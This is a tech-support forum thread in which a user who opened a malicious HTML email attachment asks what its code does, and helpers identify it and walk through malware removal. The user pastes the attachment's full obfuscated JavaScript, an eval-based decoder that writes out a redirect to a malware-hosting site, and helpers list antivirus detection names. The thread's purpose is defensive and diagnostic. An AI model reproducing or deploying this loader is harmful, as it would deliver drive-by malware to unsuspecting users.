[Okta Webinar] Learn how to a build a cloud-first strategyRegister Now

x
  • Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 1056
  • Last Modified:

Does Anyone Know This Malicious Attachment

Hi,

I just received one of those spam emails that had an attachment inside it from what looked like a person I recognised. The attachment was a not too unfamiliar report.html name and I opened it with firefox.

The attachment was a few lines of javascript which I have included below for reference and appear to be part of the jsunpack tool.

After clicking on the attacment, a line of text appeared in the browser along the lines of please wait a few seconds. At this point I right clicked the attachment and ran an AVG scan on it which reported Malware.

Additionally A window popped up which appeared to be Windows Firewall asking me if I wanted to block Windows Explorer. I clicked "Block" and then shutdown the computer.

I re-booted and all seems to be OK but the Windows Firewall message is displayed asking if I want to Keep Blocking Windows Explorer.

Does anyone understand the code below and know if this is a virus / trojan that I can find out what it does and try to remove it ? I have run a full AVG scan but it doesnt report a virus is present.

Many thanks

<script language="JavaScript" type="text/javascript">function bn6s(m0ga){var
lpr5,co7a="",idmu,s1d5="goac>tep \":/;iv=b-nq.rhfuxm0sl<",os9w,yvsg=s1d5.length;eval(unescape("%66un%63ti%6Fn b%7677%28jn%63v){%63o7%61+=%6Ancv%7D"));for(os9w=0;os9w<m0ga.length;os9w++){idmu=m0ga.charAt(os9w);lpr5=s1d5.indexOf(idmu);if(lpr5>-1){lpr5-=(os9w+1)%yvsg;if(lpr5<0){lpr5+=yvsg;}bv77(s1d5.charAt(lpr5));}else{bv77(idmu);}}eval(unescape("%64oc%75me%6Et.w%72it%65(c%6F7a)%3Bco%37a=%22%22;"));}bn6s("gs\"\"pvliv-snops<o0\"mi;lrb>>g<-tp. qvaqo< mcnqhmslere.ll=oa-<.g;0fm:ot--r=");</script><noscript>To display this page you need a browser that supports JavaScript.</noscript>
0
ls21gce
Asked:
ls21gce
  • 7
  • 5
  • 3
  • +3
1 Solution
 
John JenningsOwnerCommented:
Hard to say for sure exactly what it does.

It appears to use some encryption.
0
 
John JenningsOwnerCommented:
On a side-note,

Go to Google and download MalwareBytes Anti-Malware, their free version. Install it, and run a scan with it. I bet it finds something.
0
 
hello_everybodyCommented:
It will direct you to: http://nobletree.org/x.html (that specific page doesn't exist, but the website does).

I hope that helps!
0
 The Evil-ution of Network Security Threats

What are the hacks that forever changed the security industry? To answer that question, we created an exciting new eBook that takes you on a trip through hacking history. It explores the top hacks from the 80s to 2010s, why they mattered, and how the security industry responded.

 
John JenningsOwnerCommented:
0
 
Thomas Zucker-ScharffSystems AnalystCommented:
0
 
ls21gceAuthor Commented:
What is this nobletree.org website about ? I clicked on this but it is some kind of investments website ?
Is there really a guy on here masquerading as a "Master" just to send people to his investments site ?
0
 
Thomas Zucker-ScharffSystems AnalystCommented:
As I said don't go there.  What ever the site is, it isn't worth endangering your computer/identity over.  Whenever you have a questionable website, if youdon't use a link checker like linkextender, AVG link checker, or Web of Trust, use F-secure's URL checker:

https://browsingprotectionbeta.f-secure.com/swp/home
0
 
ls21gceAuthor Commented:
Can I just recap on your view of this embedded javascript code...

By opening this code in a browser, it will not have been able to deposit any sort of "payload" onto my computer in the form of virus etc. Instead it is a harmless re-direction to some kind of investments website in an attempt to gather business ?

Thanks
0
 
Thomas Zucker-ScharffSystems AnalystCommented:
It is a redirection to that site, but according to the f-secure site it is anything BUT harmless - beware of a payload from that site.
0
 
Sudeep SharmaTechnical DesignerCommented:
I have saved the above said code into a file and uploaded to Virustotal.com and it reported that atleast 9 antivirus vendor found this code suspicious. Here are the ones which have detected the virus:

Authentium    5.2.0.5    2010.09.20    HTML/Redir.C
ClamAV    0.96.2.0-git    2010.09.20    JS.Generic
F-Prot    4.6.2.117    2010.09.20    HTML/Redir.C
Kaspersky    7.0.0.125    2010.09.20    Trojan-Downloader.JS.Small.ov
Microsoft    1.6201    2010.09.20    VirTool:JS/Obfuscator.W
NOD32    5465    2010.09.20    JS/Redirector.NAU
PCTools    7.0.3.5    2010.09.20    Trojan.Webkit
Sophos    4.57.0    2010.09.20    JS/WndRed-B
VirusBuster    12.65.16.0    2010.09.20    JS.Redirector.Gen.13

There is no detail information available on net.

http://www.securelist.com/en/descriptions/15411634/Trojan-Downloader.JS.Small.ov

Since you mentioned that AVG detected it so I think you are safe and no harmful files are downloaded to your computer.

Sudeep
0
 
ls21gceAuthor Commented:
Hi Sudeep,

Thanks for your comments but I am not so confident that there was no harm done to my system.

What happened was that I received the message PLEASE WAITING 4 SECOND...
Then another window popped up which looked like it was from Windows Firewall asking me if I wanted to block Windows Explorer. I immediately clicked on the "Block" button thinking I was doing the right thing but I now suspect this was actually a fake screen designed to look like Windows Firewall and when I clicked I executed a payload. This was when my screen went blank and appeared to be scanning through files in DOS mode. I immediately executed a shutdown but this was likely to be too late.

I have re-booted my system and the same pop-up message appeared asking if I wanted to keep blocking Windows Explorer to which I clicked on "Keep Blocking" and all seems to be working OK but how can I tell if my computer or our network is now infected ?

I have executed an AVG virus scan which shows nothing.

0
 
Sudeep SharmaTechnical DesignerCommented:
Just to make sure the system is clean do following:

Try HitManpro to make sure anything which might be left behind is clean:
32bit
http://dl.surfright.nl/HitmanPro35.exe
http://download.cnet.com/Hitman-Pro-3/3000-2239_4-10895604.html

64bit
http://dl.surfright.nl/HitmanPro35_x64.exe

If issue is not resolved by these tools try TDSSKiller:
http://support.kaspersky.com/downloads/utils/tdsskiller.zip
http://support.kaspersky.com/downloads/utils/tdsskiller.exe

Tutorial on TDSSKiller:
http://support.kaspersky.com/viruses/solutions?qid=208280684

If this does not resolve your issue then try Combofix:

Download Combofix
http://download.bleepingcomputer.com/sUBs/ComboFix.exe
http://www.forospyware.com/sUBs/ComboFix.exe
http://subs.geekstogo.com/ComboFix.exe

Tutorial on how to use combofix:
http://www.bleepingcomputer.com/combofix/how-to-use-combofix

Post logs here for further analysis.

Sudeep
0
 
ls21gceAuthor Commented:
Hi Sudeep,

I have run all three of the tools you suggested. There were a further .exe files identified and removed that were not seen by AVG. They were a.exe created today in My Documents and what looked like the same program (by size) in Application Data/Tivy/apola.exe So it looks like this had deposited something onto my system but what it is and whether all instances are removed is another question. I am just not sure if I can trust my system any more as this appears to be a new threat. I cant find any reference to Tivy/apola on the net anywhere...Also it detected Variant.Kazy.711 which I can also not find.

I have also posted the logs as you suggested.

Many thanks
Combo-Fix-log.txt
Hitman-log.xml
TDSSKiller.2.4.2.1-20.09.2010-23.txt
0
 
Sudeep SharmaTechnical DesignerCommented:
Could you please run Combofix one more time and paste the logs here?

Sudeep
0
 
ls21gceAuthor Commented:
Hi Sudeep,

I have now re-run the COMBOFIX Tool and the log of Run2 is attached

Thanks
Combo-Fix-log-Run2.txt
0
 
Sudeep SharmaTechnical DesignerCommented:
Combofix logs above seems pretty clean to me. Are you still noticing any suspicious EXE anywhere in the system?

Even after reboot?

Sudeep
0
 
ls21gceAuthor Commented:
Hi Sudeep,

I am not noticing anything out of the ordinary, apart from the odd unexpected MS Outlook abend but I have an unnerving feeling almost paranoia that if I log into my online banking account or enter my credit card details that there might be an undetected trojan gathering the data to be sent to a rogue website somewhere.

I would certainly feel a lot happier if one of the big anti-virus companies tested this virus to find out what it is doing.

Do you think it will now be possible to trust this PC is clean and safe ?

Thanks
0
 
waldosmxCommented:
Hi Is21gce, I recomend you start a topic here ;) geekstogo.com/forum/forum/37-virus-spyware-malware-removal/
0
 
Sudeep SharmaTechnical DesignerCommented:
Since most of things are been removed I think you are good to go. However we could not say for sure if there is anything else which is left behind. But I must say you are in position now where you could easily take the backup of your system and do a clean install.

Sudeep
0
 
ls21gceAuthor Commented:
Top Notch Advice !
0

Featured Post

Free Tool: SSL Checker

Scans your site and returns information about your SSL implementation and certificate. Helpful for debugging and validating your SSL configuration.

One of a set of tools we are providing to everyone as a way of saying thank you for being a part of the community.

  • 7
  • 5
  • 3
  • +3
Tackle projects and never again get stuck behind a technical roadblock.
Join Now